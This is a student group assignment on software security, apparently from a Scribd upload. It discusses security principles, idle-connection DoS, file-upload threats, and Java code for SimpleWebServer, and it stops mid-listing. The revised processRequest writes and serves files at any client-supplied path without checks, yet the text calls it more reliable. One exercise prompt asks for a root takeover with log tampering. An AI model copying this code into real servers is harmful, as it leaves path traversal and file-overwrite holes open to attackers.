0% found this document useful (0 votes)
6 views37 pages

Security

The document outlines a group assignment on software security principles, focusing on key concepts such as authentication, authorization, confidentiality, integrity, accountability, and non-repudiation. It emphasizes the interdependencies between these concepts and their importance in protecting systems from attacks, including potential vulnerabilities and real-world examples. Additionally, it discusses the implications of attacks like Denial of Service (DoS) and suggests strategies for mitigation.

Uploaded by

yefeco6136
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
6 views37 pages

Security

The document outlines a group assignment on software security principles, focusing on key concepts such as authentication, authorization, confidentiality, integrity, accountability, and non-repudiation. It emphasizes the interdependencies between these concepts and their importance in protecting systems from attacks, including potential vulnerabilities and real-world examples. Additionally, it discusses the implications of attacks like Denial of Service (DoS) and suggests strategies for mitigation.

Uploaded by

yefeco6136
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 37

BAHIR DAR INSTITUTE OF TECHNOLOGY

FACULITY OF COMPUTING

Fundamentals of Software Security Group Assignment

Group Members
1. Abrham Mulualem………… 1504836
2. Dawit Gebeyehu…………… 1509830
3. Eyerus Tekto………………. 1506000
4. Genet Tesfaye……………… 1506226
5. Leul Esubalew………………1509829
6. Mahder Samuel……………..1506873
7. Meron Yeneneh……………. 1507102
8. Yared mehari ………………1508177

1
Table of Contents
Introduction ................................................................................................................................................... 3
PART 2: Security Design Principles............................................................................................................. 4
1. Authentication and Authorization ..................................................................................................... 4
2. Confidentiality and Integrity ............................................................................................................. 6
3. Accountability and Non-Repudiation ............................................................................................... 8
What happens if a client connects to SimpleWebServer, but never sends any data and never
disconnects? What type of an attack would such a client be able to conduct? ....................................... 11
Programming problem 1 ............................................................................................................................. 13
Programming Problem3: ............................................................................................................................. 23

2
Introduction
Security design principles are the foundation of creating software that is both reliable and
resilient to attacks. These principles guide developers in building systems that protect sensitive
data, ensure authorized access, and maintain functionality even under malicious attempts to
compromise the system. By following these principles, software can be made more robust
against evolving threats and vulnerabilities.
At the heart of software security lies the understanding of key concepts such as authentication,
authorization, data integrity, and system availability. These concepts often work together—
authentication, for instance, verifies the identity of users, which is a prerequisite for determining
what they are allowed to do (authorization). A lack of coordination between these principles can
lead to exploitable weaknesses in software systems.
In practice, implementing security involves identifying potential threats and addressing them
effectively. For example, allowing users to upload files introduces risks such as malicious file
uploads, which could compromise the server. Similarly, ensuring that servers handle client
connections properly prevents attacks like denial-of-service (DoS), where resources are
overwhelmed by malicious activity. Addressing these threats requires the application of security
mechanisms like input validation, access control, and resource management.
Furthermore, real-world attacks often exploit misconfigurations or poor coding practices. For
instance, running a web server with excessive privileges, such as root access, can expose the
entire system to takeovers if vulnerabilities are exploited. An attacker could modify files, deface
websites, or even gain full control of the server. Such scenarios highlight the importance of
following the principle of least privilege and employing logging and monitoring to detect and
mitigate unauthorized actions.
By understanding and applying security design principles, developers can proactively protect
systems from a wide range of attacks. These principles not only ensure the safety of software but
also instill trust in users, demonstrating a commitment to safeguarding their data and interactions
with the system.

3
PART 2: Security Design Principles
Are there dependencies between any of the security concepts that we covered?
For example, is authentication required for authorization? Why or why not?

Yes there are dependencies between the security concepts. Some of them are:

1. Authentication and Authorization

As we discussed, Authentication is the process of verifying the identity of a user, system, or


entity. It is the security mechanism that answers the question: "Who are you?" Common
methods of authentication include Something You Know, something You Have,Something
You Are.

The purpose of authentication is to ensure that the system can uniquely identify the user or entity
requesting access. Once authentication is successful, the system has confidence in the identity of
the requester.

Authorization, on the other hand, answers the question: "What are you allowed to do?" It is the process
of granting or denying permissions to resources or actions based on the authenticated identity.
Authorization mechanisms often rely on predefined policies, roles, or access control lists (ACLs).

Dependencies between Authentication and Authorization

While authentication and authorization are distinct processes, they are highly dependent on each
other. Authorization is meaningless without authentication because the system needs to verify
the identity of the user before determining what they are allowed to do. We can say that
Authorization cannot exist without authentication. The system needs to know who you are before
it can decide what actions you’re allowed to perform. Authorization is inherently dependent on
authentication. Without confirming the identity of the user, the system cannot enforce any
meaningful access controls. Imagine a scenario where a system skips authentication and directly
allows access based on assumed identities. This would make it easy for malicious actors to
bypass security and gain unauthorized access.

To illustrate this dependency, we can consider the following analogy:

4
Authentication is like showing your ID at the entrance of a restricted area. It proves you
are who you claim to be. Authorization is the list of rooms you’re allowed to enter. Once
your identity is verified, security personnel check whether you’re permitted to access certain
areas.

Without verifying your identity (authentication), the security guard cannot determine your access
rights (authorization). Similarly, in software systems, the lack of authentication would render
authorization mechanisms ineffective.

Why Authentication is Crucial for Authorization

Authentication acts as the foundation upon which authorization builds. Without a verified
identity, any attempt at authorization becomes arbitrary and insecure. If authentication fails, the
system cannot proceed to authorization because it has no idea who is attempting to access the
resources.

For example, If an attacker can bypass authentication, they may gain unauthorized access to
resources, rendering authorization policies ineffective.

Potential Issues if Authentication is Missing

Without authentication, authorization can become a significant vulnerability. Imagine a web


application that grants administrative access to anyone who simply navigates to an admin URL.
In such a case, there’s no assurance of the user's identity, allowing attackers to exploit this
loophole and compromise the system. Without authentication, authorization becomes
meaningless and the system is wide open for abuse.

Suppose a public Wi-Fi network doesn’t require authentication (like entering a password).
Anyone in the area could connect, including malicious users. Once connected, they might exploit
the network to access sensitive data or launch attacks on other connected devices.

5
Banking Without Login: Imagine a banking app that lets anyone access the account features
without logging in. Without verifying who the user is, anyone could: View your bank balance ,
transfer money, access sensitive personal details. This would be catastrophic for both the users
and the bank.

Real-World Exapmles

In real-world systems, authentication and authorization work together to enforce security


policies. Consider the following scenarios:

Online Banking:

Authentication: Users log in using a combination of username, password, and a one-time


password (OTP) sent to their registered device.

Authorization: Once authenticated, users can view account balances, but only those with
specific permissions can initiate fund transfers or update account details.

Hotel Example: When you check into a hotel, the receptionist verifies your identity
(authentication) using an ID or reservation details. Once verified, you’re given a room keycard.
This keycard controls where you’re authorized to go—your room, the gym, or the breakfast
lounge. Without confirming who you are, the hotel cannot decide which keycard to issue or what
access permissions you should have.

School System Example: A teacher logs into a school’s grading portal. Authentication verifies
that the user is indeed a teacher. Authorization then allows the teacher to view and edit only the
grades for their own classes, not for students in other classes.

2. Confidentiality and Integrity

Confidentiality ensures that information is only accessible to those who are authorized to see it.
It prevents unauthorized access to sensitive data and answers the question “Who can access this
information?” . The key Features of Confidentiality include data protection,
encryption,Access Control.

6
For example, When you log into your online banking account, your financial data is protected
through encryption. Confidentiality ensures no one else can intercept and view your transactions.

Integrity ensures that information is accurate, consistent, and not altered by unauthorized parties.
It answers the question: “Is this information correct and unaltered?”. Key features of
Integrity include data validation, hashing, checksums and digital signatures.

For example, Imagine sending a contract via email. If the email’s content is altered during
transit, the recipient could receive false or manipulated information. To preserve integrity, digital
signatures can verify that the email content has not changed.

How Confidentiality and Integrity Depend on Each Other

Confidentiality Without Integrity - If a system only ensures confidentiality but not integrity,
attackers could manipulate data without anyone knowing, even if the data remains hidden from
unauthorized users.

For example An attacker intercepts and alters an encrypted file. Although the file is encrypted
(confidentiality), the attacker could corrupt its content because the system does not validate its
integrity.

Integrity Without Confidentiality - If a system ensures integrity but not confidentiality, attackers
might not be able to modify the data, but they can still see it.

For example:A bank statement might be digitally signed to ensure integrity, but if it’s sent in
plain text without encryption, unauthorized users can read its sensitive details.

Dependency Between the Two

Integrity Requires Confidentiality - To prevent tampering with sensitive information, you first
need to ensure it cannot be accessed by unauthorized parties (confidentiality).

Confidentiality Requires Integrity - If the data being protected is corrupted or manipulated, the
confidentiality of false or inaccurate data becomes meaningless.

7
Which Comes First?

Neither concept is inherently more important than the other. They often complement each other.
However, in certain cases:

Confidentiality First: Systems handling highly sensitive data (e.g., government secrets or
financial records) prioritize confidentiality to prevent data exposure.

Integrity First: Systems like public health databases may prioritize integrity to ensure that
accurate information is available to everyone, even if confidentiality is less critical.

Real-World Examples of Dependency

Secure Messaging Apps - Apps like WhatsApp use encryption (confidentiality) to ensure that
messages can only be read by the sender and receiver. They also include message authentication
codes (integrity) to ensure that the messages are not altered during transit.

File Downloads - When downloading software from a website, the site may provide a checksum
or digital signature. This ensures that the file you downloaded (confidentiality) is the same as the
one on the server and has not been corrupted (integrity).

Potential Issues When One is Missing

Missing Confidentiality
In online banking, if an attacker can view your account details (lack of confidentiality), they can
misuse this information, even if the data remains accurate.

Missing Integrity
Consider medical test results being transmitted to a doctor. If an attacker alters the results (lack
of integrity), the patient could receive a misdiagnosis, even if the communication is encrypted.

3. Accountability and Non-Repudiation

Accountability ensures that every action within a system can be attributed to a specific individual
or entity. It allows organizations to monitor user activities, detect unauthorized behavior, and

8
hold individuals responsible for their actions. Some of the key features of Accountability are
Logging and Monitoring , Audit Trails , Role Definition.

Fro example, ATMs keep a record of every transaction linked to specific users via their cards
and PINs. If a dispute arises about a withdrawal, the bank can review the transaction logs.

Non-repudiation ensures that a user cannot deny performing an action or sending data. It
provides proof that the action occurred, often through mechanisms like digital signatures or
secure logging.

For example, When you purchase something online, the system generates a receipt with your
order details and timestamp. This ensures that you cannot deny making the purchase.

Dependency Between Accountability and Non-Repudiation

Accountability often depends on non-repudiation to ensure that recorded actions can be tied to
individuals without the possibility of denial. Non-repudiation provides the proof required to
make accountability enforceable.

Why Non-Repudiation is Required for Accountability?

Accountability requires trust in the accuracy of logs or records. Without non-repudiation


mechanisms, users could deny performing logged actions, undermining the reliability of the
accountability process.

For example, if a user’s actions are recorded in a log but they can claim the log was forged or
tampered with, the accountability system fails. Digital signatures or cryptographic proofs ensure
the integrity and authenticity of those logs.

Can Accountability Exist Without Non-Repudiation?

Accountability can exist without strong non-repudiation mechanisms in some cases, but it
becomes weaker. For instance: A basic logging system might track user actions, but without
tamper-proof records (provided by non-repudiation), the user can argue the logs are inaccurate.

9
Which Comes First?

Non-Repudiation First: Non-repudiation lays the foundation for accountability by ensuring


that all actions are provable and cannot be denied. Without non-repudiation, accountability
mechanisms might lack credibility.

Accountability First: In practical implementations, accountability mechanisms like logging


are set up before non-repudiation measures are added. However, accountability is incomplete
without the assurance provided by non-repudiation.

Real-World Examples of Dependency

Banking Transactions -

Accountability: A banking system logs every transaction made by a user, including deposits and
withdrawals. Non-Repudiation: Digital
receipts and timestamps are issued for each transaction, ensuring the user cannot deny making
them.

Email Communication:

Accountability: Email servers maintain logs of who sent emails and when.
Non-Repudiation: Digital signatures ensure that the sender cannot deny sending the email and
that the content was not altered in transit.

Potential Issues When One is Missing

]If a system lacks accountability, it becomes impossible to determine who performed certain
actions. For example, In a shared computer system without user-specific logging, if someone
deletes critical files, no one can be held responsible.

Without non-repudiation, individuals can deny their actions, making accountability


unenforceable. For Example, In an online payment system, if there’s no receipt or signature
proving the transaction, the payer could deny making the purchase.

10
What happens if a client connects to SimpleWebServer, but never sends any data
and never disconnects? What type of an attack would such a client be able to
conduct?

If a client connects to SimpleWebServer and never sends any data, also never disconnects, then
the client can perform a DoS, also known as an Idle Connection Attack. In this kind of attack, the
attacker exploits the resources of the server by keeping connections open without any activity,
thus making legitimate users unable to connect to the server. This attack happens in several
ways:

 Resource Exhaustion: A server allocates resources, such as memory and file descriptors,
to each connection. If too many clients connect and stay idle, all of the resources will be
used up and no legitimate users will be able to connect to the server.
 Connection Flooding: An attacker may create multiple connections without sending any
data. In such a case, the server may get flooded by handling new connections. This could
result in either slow responses or complete unavailability of a service to legitimate users.
 TCP Connection Limits: Most servers have a limit on the number of concurrent
connections they can handle. By keeping connections open without sending data, an
attacker can reach this limit, effectively blocking new connections.
 Idle Timeout Manipulation: If the server has some kind of timeout for idle connections,
then an attacker can exploit this to keep connections alive longer than intended; this can
cause resource leaks or delays in handling legitimate requests.

Why it is not easily detectable

 Web servers usually try to be polite and stay connected until data is received from a
client.
 The attack works by making multiple connections and holding each of them without
sending any substantial amount of data.
 Unlike other types of attacks, a Slowloris attack utilizes very low bandwidth, hence hard
to detect.

Some effective strategies for mitigating Denial of Service (DoS) on a web server:

11
i. Rate Limiting: Limit the number of requests a client can make over a certain amount of
time. It prevents one client from overwhelming the server with a lot of outgoing
connections.
ii. Connection Timeouts: Use proper connection timeouts for idle connections. If a
connection remains idle for longer than a threshold amount of time, it is dropped to free
up the resources for users.
iii. Load Balancing: Use load balancers to distribute incoming traffic across multiple servers.
This can help absorb the impact of an attack and maintain service availability.
iv. IP Blacklisting/Whitelisting: Monitor traffic patterns and block IP addresses that exhibit
suspicious behavior. Conversely, whitelisting known good IPs can help reduce the risk of
attacks.
v. Web Application Firewalls: Implement a WAF to filter and monitor the HTTP traffic to
and from the web application. A WAF can easily help in detecting and blocking such
malicious requests right before they actually reach the server.
vi. Traffic Analysis and Anomaly Detection: Establish mechanisms to analyze patterns of
traffic and detect anomalies. This may enable early detection of attacks and rapid
responses.
vii. Scaling Resources: Utilize cloud services that offer dynamic scaling of resources to
handle any sudden spike in traffic-both valid and invalid.
viii. CAPTCHA: Introduce a CAPTCHA challenge for specific actions initiated by a user or
when high traffic is encountered, in order to ensure the request originator is a human
user, not an automated script.
ix. Session Management: Make use of session management techniques whereby the number
of concurrent sessions per user can be restricted as an efficient countermeasure to
resource exhaustion.
x. Redundancy and Failover Systems: Utilize redundant systems with failover mechanisms
so that in case one server fails or gets overloaded, the service remains uninterrupted
because other servers switch in seamlessly.
xi. Regular Security Audits: Perform periodic security audits and vulnerability assessments
to find and fix potential loopholes within the server configuration and application code.

12
xii. Training of Staff: Train staff in security practices and the monitoring of unusual activity
to set all eyes searching for potential hazards and ways in which to act and respond.
xiii. Incident Response Plan: Establish an incident response plan that details the things to be
performed if a DoS attack occurs and allows for a timely and orderly reaction to
minimize damages.
xiv. Content Delivery Networks (CDNs): Utilize CDNs to cache content and serve it from
multiple locations. This can help offload traffic from the origin server and absorb some of
the attack traffic.

By combining these strategies, web servers can significantly reduce their vulnerability to DoS
attacks and maintain better service availability for legitimate users.

Programming problem 1

 HTTP supports a mechanism that allows users to upload files in


addition to retrieving them through a PUT command.
 What threats would you need to consider if Simple Web Server also had
functionality that could be used to upload files?
 For each of the specific threats you just listed, what types of security
mechanisms might you put in place to mitigate the threats
If a Simple Web Server were to implement file upload functionality, the system would need to
address several critical security threats. When integrating file upload capabilities into a web
application, you open up the server to a variety of security risks,

1. Malicious File Upload: Attackers could upload files that contain malicious content, such as
malware, shell scripts, or even code that might be executed on the server (e.g., PHP, Python, or
executable files). Such files could result in server compromise or enable attackers to escalate
their privileges.

Risk: This can lead to arbitrary code execution, remote code execution (RCE), or even server
hijacking.

To mitigate this threat

 File Type and Signature Validation: You should not rely solely on file extensions. Files
should be validated by checking both MIME types and the magic bytes (file signatures)
to ensure the file content matches its declared type.

13
 Antivirus Scanning: Use security tools or third-party services to scan files for viruses
and malware (e.g ClamAV, or commercial tools).
 Whitelist Allowed File Types: Instead of trying to block potentially dangerous file
types, explicitly define which types are allowed (e.g., only images, PDF documents). This
can significantly reduce risk.

2. Path Traversal Attacks: Attackers might exploit file upload functionality by attempting path
traversal attacks, where they include sequences like ../../../ in the file path. This could allow them
to access or overwrite sensitive files outside of the designated upload directory.

Risk: It could lead to data breaches, unauthorized access to sensitive files, or server
misconfigurations.

To mitigate this threat:

 Sanitize Input: Ensure that uploaded file names are sanitized to remove any path traversal
characters (.., /, \). This can be done by normalizing file paths before saving.
 Restrict File Paths: Do not allow the specification of file paths. Always use a server-
generated name for each file (e.g., a UUID or hash of the file content), and store files in a
designated, isolated directory.
 Use Absolute Paths: Always resolve file paths to absolute paths and verify that the
resolved path remains within the intended directory.

3. Overwriting Existing Files: If an attacker uploads a file with the same name as an important
system file or configuration file, this could cause the file to be overwritten, potentially leading to
system compromise.

Risk: Data loss, system corruption, or unauthorized access could occur if critical files are
overwritten.

To mitigate this threat:

 Unique File Naming: Generate a unique identifier for each uploaded file (e.g., a UUID,
timestamp, or cryptographic hash of the file content) to prevent name collisions.
 Check Before Overwriting: Always check if the file already exists and if so, reject the
upload or assign a new name.
 File Integrity Checks: For particularly sensitive or important files, consider
implementing integrity checks (e.g., using hashes) to verify that they haven't been
tampered with.

4. Denial of Service (DoS) Attacks: An attacker could attempt to upload very large files or
perform frequent uploads to exhaust server resources such as disk space, memory, or bandwidth.

Risk: This could lead to service unavailability, degraded server performance, or potentially a
system crash.

14
To mitigate this threat:

 Limit File Size: Impose a strict file size limit (e.g., 10MB or 100MB) to prevent large
files from consuming excessive disk space or memory.
 Limit the Number of Requests: Implement rate-limiting on upload requests to mitigate
the risk of flooding the server with too many requests in a short time.
 Timeouts: Set reasonable timeouts for file uploads and reject uploads that take too long
to complete.

5. Remote Code Execution (RCE) via File Upload: Attackers could upload executable code or
scripts (e.g., PHP, JSP, ASP files), which, when accessed, could be executed on the server,
resulting in remote code execution.

Risk: This is one of the most severe risks as it can give attackers full control over the server and
potentially the entire network.

To mitigate this threat:

 Restrict File Extensions and Content: Explicitly block the upload of executable files
such as .exe, .php, .jsp, .asp. Even if these file types are renamed or disguised, they
should still be detected through signature analysis.
 Server Configuration: If it's necessary to allow certain types of files (like .php for
legitimate reasons), configure the server so that files in the upload directory cannot be
executed (e.g., by placing them outside the web root or by modifying the web server's
configuration to block script execution in that directory).
 File Permissions: Store uploaded files with strict permissions to prevent them from being
executed.

6. Cross-Site Scripting (XSS) via Uploaded Files Attackers could upload HTML or JavaScript
files that, when served to users, could execute malicious scripts in their browsers. This could lead
to session hijacking, cookie theft, or user impersonation.

Risk: XSS attacks could compromise the security of users visiting the site, steal sensitive data, or
perform unauthorized actions.

To mitigate this threat:

 Sanitize Content: If HTML files or documents are allowed, sanitize the contents of these
files to remove any malicious JavaScript or HTML that could trigger XSS attacks.
Libraries like DOMPurify can help sanitize user-uploaded HTML.
 Content Security Policy (CSP): Implement a CSP that restricts the execution of
JavaScript and other potentially dangerous content unless explicitly trusted.
 Escape Output: For any user-uploaded content that might be displayed on the web page,
ensure proper escaping of any special characters in the output to prevent script execution.

15
7. Insecure File Storage and Access Control If uploaded files are not properly stored or
protected, attackers might gain unauthorized access to the files, potentially exposing sensitive
data (e.g., passwords, personal information, etc.).

Risk: This could lead to a data breach or unauthorized access to sensitive information.

To mitigate this threat:

 File Permissions: Store files with minimal permissions, ensuring only authorized users
or systems can access them.
 Encryption: For sensitive files, encrypt them both at rest (on disk) and in transit (while
being uploaded or downloaded).
 Isolated Upload Directories: Store files in directories that are not directly accessible
through the web server (i.e., outside of the public document root).

8. Insufficient Logging and Monitoring: Lack of proper logging and monitoring could allow
malicious file uploads to go unnoticed, making it difficult to detect or prevent attacks.

Risk: This could lead to prolonged exploitation, as attackers would not be detected in time to
mitigate damage.

To mitigate this threat:

 Comprehensive Logging: Log every upload attempt, including details like the file name,
file size, MIME type, user ID, and upload timestamp. Logs should be reviewed regularly
for suspicious activity.
 Real-Time Alerts: Set up monitoring tools to trigger alerts when abnormal file uploads
are detected (e.g., large files, frequent uploads, or dangerous file types).

Programming Problem2:
public void storeFile (BufferedReader br, OutputStreamWriter osw, String pathname) throws
Exception {
FileWriter fw = null; try {
fw = new FileWriter(pathname); String s = br.readLine();
while (s != null) { fw.write(s);
s = br.readLine();
}
fw.close();
osw.write("HTTP/1.0 201 Created"); } catch(Exception e) {
osw.write("HTTP/1.0 500 Internal Server Error"); }

16
}
public void logEntry(String filename,String record) { FileWriter fw = new FileWriter (filename,
true); fw.write(getTimestamp()+ " " + record); fw.close();
}
public String getTimestamp() { return (new Date()).toString();
}

 Modify the processRequest() method in SWS to use this file storage and
logging code
Modified processRequest()
public void processRequest(Socket s) throws Exception {
// Used to read data from the client.
BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
// Used to write data to the client.
OutputStreamWriter osw = new OutputStreamWriter(s.getOutputStream());
// Read the HTTP request from the client.
String request = br.readLine();
String command = null;
String pathname = null;
StringTokenizer st = new StringTokenizer(request, " ");
command = st.nextToken();
pathname = st.nextToken();
try {
if (command.equals("GET")) {
// Handle GET request: Serve the requested file.
serveFile(osw, pathname);
} else if (command.equals("POST")) {
// Handle POST request: Store the file using the provided storeFile method.
storeFile(br, osw, pathname);
// Log the successful file storage using the provided logEntry method.

17
logEntry("server.log", "File successfully created at: " + pathname);
} else {
// Handle unsupported commands.
osw.write("HTTP/1.0 501 Not Implemented\r\n");
osw.write("Content-Type: text/plain\r\n");
osw.write("\r\n");
osw.write("Error: Command not implemented.\n");
osw.flush();
// Log the unsupported command.
logEntry("server.log", "Unsupported command received: " + command);
}
} catch (Exception e) {
// Handle any exceptions during request processing.
osw.write("HTTP/1.0 500 Internal Server Error\r\n");
osw.write("Content-Type: text/plain\r\n");
osw.write("\r\n");
osw.write("Error processing request: " + e.getMessage() + "\n");
osw.flush();
// Log the error using the provided logEntry method.
logEntry("server.log", "Error processing request: " + e.getMessage());
} finally {
// Close the connection to the client.
osw.close();
}
}
// Placeholder for serveFile method
private void serveFile(OutputStreamWriter osw, String pathname) throws Exception {
try {

18
File file = new File(pathname);
if (!file.exists()) {
osw.write("HTTP/1.0 404 Not Found\r\n");
osw.write("Content-Type: text/plain\r\n");
osw.write("\r\n");
osw.write("Error: File not found.\n");
} else {
osw.write("HTTP/1.0 200 OK\r\n");
osw.write("Content-Type: text/plain\r\n");
osw.write("\r\n");

// Read the file and write its content to the client.


BufferedReader fileReader = new BufferedReader(new FileReader(file));
String line;
while ((line = fileReader.readLine()) != null) {
osw.write(line + "\n");
}
fileReader.close(); }
osw.flush();
} catch (IOException e) {
osw.write("HTTP/1.0 500 Internal Server Error\r\n");
osw.write("Content-Type: text/plain\r\n");
osw.write("\r\n");
osw.write("Error serving file: " + e.getMessage() + "\n");
osw.flush();
// Log the error.
logEntry("server.log", "Error serving file: " + e.getMessage());
}

19
}
Before the Changes
The original processRequest() method contained repetitive and scattered logic for handling file
storage and logging. In the case of POST requests, the file storage was manually implemented
with a FileOutputStream where each line had to be read and written to a file individually.
Although it worked, this approach duplicated code that could have been centralized for
reusability. Logging was implemented in some places, but it was done inconsistently with
hardcoded messages and no uniform formatting or timestamps, making it difficult to trace
events. Logging for unsupported commands or errors was either missing or not integrated into a
standardized framework. Moreover, the placeholder for the serveFile() method meant that GET
requests were not properly supported, leaving the server incomplete.
After the Modifications
The revised processRequest() method now utilizes the existing storeFile() method for file storage
during POST requests, thus avoiding code duplication. This approach guarantees that the
behavior of file storage is always the same and that proper HTTP responses are sent to the client.
Logging was also improved by fully integrating the logEntry() method, which provides uniform
formatting and timestamps for all logged events, including successful file storage, unsupported
commands, and error handling. This improves the modularity of the code and maintainability.
Now, the server can serve files completely because the serveFile() method has been added to
handle GET requests. All these changes make the code of the server much more readable,
maintainable, and reliable.
A deeper look into the chages is as follows:
1. Replace Manual File Storage with storeFile()
Original:
File storage during POST requests was done manually using a FileOutputStream. The server read
each line of input and wrote that to the file, ensuring that line breaks were preserved. It worked
but forced repetitive code, not allowing for centralized error handling and consistent HTTP
responses.
Modified:
The manual file-writing logic is now replaced with a call to storeFile(), which encapsulates all
the operations required to store a file. The change centralizes the logic of handling files in one
place, making it reusable and thus easier to maintain. The storeFile() method also takes care of
HTTP response codes—201 Created on success or 500 Internal Server Error on failure—without
duplicating logic in processRequest().
This is better because
 Redundancy of file storage logic is reduced; debugging is made easier.

20
 Common HTTP response handling is inbuilt within the storeFile() method.

 Overall maintenance is much simplified since changes to file storage behavior need only
to be made at one place in the code

2. Centralizing Logging with logEntry()


Original:
Logging was implemented inconsistently. Some events, such as successful file storage, were
logged with handmade log entries, while others, like unsupported commands or errors, weren't
logged at all. The logging that did exist used hardcoded formatting and didn't include
timestamps, making it harder to trace server activity.
Modified:
The logEntry() method was integrated into processRequest() for each major event, including
successful file storage, errors, and unsupported commands. All log entries are now formatted
consistently with a timestamp and appended to a centralized server.log file.
Latter is better because:
 By using logEntry(), all the logs will be in a standard format with timestamps and thus
are easy to read and analyze.

 It reduces the redundant code for logging as now all the events are handled by the same
method

 Logging errors and unsupported commands enhances the traceability and debugability of
the server

3. Add Logging for Unsupported Commands


Original:
When the server received an unsupported command—say, any HTTP method other than GET or
POST—it would send a 501 Not Implemented response to the client but would not log the
occurrence. This meant that the server administrator had no record of unsupported commands
being issued.
Modified:
Added a call to logEntry(), in order to log every unsupported command received by the server.
This log entry provides the exact command and a timestamp for better insight into client
behavior and possible abuse of the server.
Latter is better because:
 It allows tracking of any unsupported commands, possibly due to end-user error or
malicious activity.
21
 Unsupported commands logging further provides the server with enhanced monitoring
and analytics.

4. Improve Error Handling and Logging


Original:
Errors that occurred while processing a request or serving a file were handled with a response to
the client of 500 Internal Server Error. However, these errors were not always logged, making
troubleshooting difficult.
Modified:
Now, all exceptions caught in processRequest() are logged through the logEntry() method with
details of the error message and a timestamp. That means all problems are logged, so there will
be a clear audit trail of any issue for debugging purposes.
Latter is better because:
 Logging errors guarantees that no issues slip through unnoticed, even if they do not
immediately appear in the client's response.

 The consistent use of logEntry() makes error tracking more systematic and easier to
analyze.

5. Implementing the serveFile() Method for GET Requests


Original:
The serveFile() method was just a placeholder and did not serve files. The server was incomplete
because it couldn't handle requests from clients for a GET, as it was not able to return files to
them.
Modified:
The serveFile() method is implemented to handle GET requests. It checks if a file requested by
the client exists, reads its contents, and sends the file data back to the client with a response of
200 OK. In case the file does not exist, it returns a 404 Not Found response. In cases where
errors occur during serving of the file, it utilizes the logEntry() method for logging errors.
Latter is better because:
 The server now fully supports GET requests for clients to download files.

 Error during serving a file is logged, which improves traceability.

 Ensures that the client receives meaningful responses: 200 OK or 404 Not Found.

With these modifications, the refactored processRequest() method is now able to benefit from
centralized and reusable logic regarding file storage and logging—features all in one consistent,

22
less redundant, and more maintainable place. The server has been made more robust, with fully
handled errors, fully supported GET and POST requests, and detailed logging of each major
event. Such changes will make the server much more reliable, traceable, and even easier to
maintain or extend in the future.
Changes with respect to each function:
File Storage Changes
The processRequest function was refactored to use the storeFile method when storing files from
a POST request. This makes things much cleaner and much more efficient, with less repetition in
writing files by hand. Now, the server benefits from having a centralized place for file storage
logic inside the storeFile method—for example, sending an HTTP response, either 201 Created
or 500 Internal Server Error, to a client. This makes the method reusable in other parts of the
application, thus avoiding redundancy and increasing maintainability.
Logging Changes
Logging within the processRequest() method has been updated to log all major events occurring
due to the logEntry() method: successful file creation, errors, and unsupported commands. The
server ensures that the log formatting is always the same by centralizing it; a timestamp is added
to each log entry for better traceability. This approach replaces scattered ad-hoc logging logic
with a reusable method that eases debugging and reduces the complexity of monitoring server
activity. Also, logging of unsupported commands and errors ensures that all client interactions,
whether successful or not, are properly recorded for analysis.

Programming Problem3:
 Run your web server and mount an attack that defaces the index.html home page.
 Assume that the web server is run as root on a Linux workstation. Mount an attackagainst
SimpleWebServer in which you take ownership of the machine that it is runningon. By
taking ownership, we mean that you should be able to gain access to a rootaccount,
giving you unrestricted access to all the resources on the system. Be sure tocover your
tracks so that the web log does not indicate that you mounted an attack.

What the Code Does

1. Purpose:
The program creates a basic HTTP server to serve a webpage (index.html). It simulates an
attack where the content of the webpage is altered to display a hacked message.
2. Key Features:
o Web Server Setup:
The WebServer class initializes the server directory, sets up a port (8080), and
creates an initial index.html file with a welcome message.
o Running the Server:
The runServer() method starts an HTTP server that listens for client requests. It
handles basic GET requests to serve the index.html file.

23
o Serving Files:
The serveFile() method reads the content of index.html and sends it to the client's
browser. If the file doesn’t exist, a "404 Not Found" error is sent.
o Simulated Attack:
The defacePage() method modifies the index.html file to replace its content with a
defacement message, simulating a website attack.
3. Simulation Steps:
o Initially, the server creates and serves a page that says:
"Welcome to the Original Page!"
o Then, the program simulates a hack where the content of index.html is changed to
display:
"Hacked by Genissss!"
4. Output:
o When you open the server in a browser (http://localhost:8080), you initially see the
original page.
o After the defacement, refreshing the page shows the hacked content.

Explanation of Key Code Components

1. Class: WebServer
o Encapsulates all the functionality to manage the server and file operations.
2. Methods:
o createWebDir(): Ensures the server directory exists.
o createInitialPage(): Creates the initial index.html file.
o runServer(): Starts the server in a loop to handle client connections.
o handleRequest(clientSocket): Processes client requests (e.g., GET).
o serveFile(out): Reads and sends the content of index.html to the browser.
o defacePage(newContent): Overwrites index.html with defacement content.
3. Main Method:
o Creates a WebServer instance, starts the server, and simulates the attack by calling
defacePage().

Real-World Risks Demonstrated

1. Server Vulnerabilities:
o The server runs with minimal security, making it prone to unauthorized
modifications.
o Running as root on Linux (as mentioned in the assignment) would grant attackers
full control over the system.
2. Defacement Attack:
o Illustrates how a hacker could replace website content if the server is
compromised.
3. Lessons Learned:
o The importance of securing file permissions and isolating processes to prevent
unauthorized access.
o The need for logging and monitoring to detect and respond to attacks.

24
import java.io.*;
import java.net.*;
import java.util.concurrent.*;

public class WebServer {


private final String host;
private final int port;
private final String webDir;
private final String indexPath;

public WebServer(String host, int port, String webDir) throws IOException {


this.host = host;
this.port = port;
this.webDir = webDir;
this.indexPath = webDir + "/index.html";
createWebDir();
createInitialPage();
}
private void createWebDir() throws IOException {
File directory = new File(webDir);
if (!directory.exists() && !directory.mkdirs()) {
throw new IOException("Failed to create web directory.");
}
}

private void createInitialPage() throws IOException {


try (BufferedWriter writer = new BufferedWriter(new FileWriter(indexPath))) {
writer.write("<html><body><h1>Welcome to the Original Page!</h1></body></html>");
}
}

25
public void runServer() {
ExecutorService executor = Executors.newSingleThreadExecutor();
executor.submit(() -> {
try (ServerSocket serverSocket = new ServerSocket(port)) {
System.out.println("Server started at http://localhost:" + port);
while (true) {
try (Socket clientSocket = serverSocket.accept()) {
handleRequest(clientSocket);
} catch (IOException e) {
System.err.println("Error handling client request: " + e.getMessage());
}
}
} catch (IOException e) {
System.err.println("Server error: " + e.getMessage());
}
});
}

private void handleRequest(Socket clientSocket) throws IOException {


try (BufferedReader in = new BufferedReader(new
InputStreamReader(clientSocket.getInputStream()));
PrintWriter out = new PrintWriter(clientSocket.getOutputStream(), true)) {

